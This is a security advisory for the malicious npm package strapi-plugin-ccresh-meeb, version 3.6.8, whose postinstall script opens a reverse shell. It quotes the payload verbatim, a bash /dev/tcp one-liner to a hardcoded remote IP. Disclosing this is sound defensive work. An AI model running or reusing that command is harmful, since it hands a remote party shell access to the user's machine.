npm · Malicious package advisory
Malwarestrapi-plugin-ccresh-meeb
GHSA-64x7-hw7m-2wrx
Malicious code in strapi-plugin-ccresh-meeb (npm)
Details
**Severity:** Critical **Affected versions:** `= 3.6.8` ## Source: amazon-inspector (5c91c798c5a3429b252f74193e2a84c6406347ced8fa9010bdd7d338af5c8797) The package's postinstall lifecycle script (`scripts.postinstall: node postinstall.js`) unconditionally invokes `/bin/bash` with an interactive reverse-shell payload at install time: `bash -c 'bash -i > /dev/tcp/14.225.210.85/443 0>&1'`. This connects stdin/stdout/stderr of an interactive bash session to a hardcoded remote host over TCP/443, handing full shell access on the installer's machine to whoever controls that endpoint. A marker file is also written under /tmp confirming execution. The manifest self-labels the package as a `Reverse shell payload for Strapi`. Any `npm install` of this package results in remote code execution and interactive shell access as the installing user. --- Credit: [OpenSSF](https://github.com/ossf/malicious-packages) ([source](https://github.com/ossf/malicious-packages/blob/9947fca3b118619628d7c35349b0b5d2b1852e1c/osv/malicious/npm/strapi-plugin-ccresh-meeb/MAL-2026-16180.json)) **References:** - https://github.com/ossf/malicious-packages/blob/9947fca3b118619628d7c35349b0b5d2b1852e1c/osv/malicious/npm/strapi-plugin-ccresh-meeb/MAL-2026-16180.json - https://www.npmjs.com/package/strapi-plugin-ccresh-meeb/v/3.6.8 - https://github.com/advisories/GHSA-64x7-hw7m-2wrx
Compromised versions (1)
- = 3.6.8
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.